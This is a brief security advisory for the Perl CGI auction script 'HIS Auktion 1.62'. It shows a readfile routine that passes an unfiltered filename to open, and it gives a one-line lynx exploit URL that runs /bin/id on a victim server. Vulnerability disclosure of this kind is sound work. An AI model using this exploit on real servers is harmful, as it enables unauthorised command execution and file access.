Name : HIS Auktion 1.62: "show files" vulnurability. About : script "HIS Auktion 1.62" is a catalog of links CGI script. The creators site http://www.his-software.de Problem: -------from auktion.pl------- sub readfile { local($filename)=$_0; local(@array); open(f,$filename); ---------------------------- $filename - is not filterred on symbols. Exploit: lynx http://www.victim.com/cgi-bin/auktion.pl?menue=/bin/id by: UkR-XblP (cuctema@ok.ru)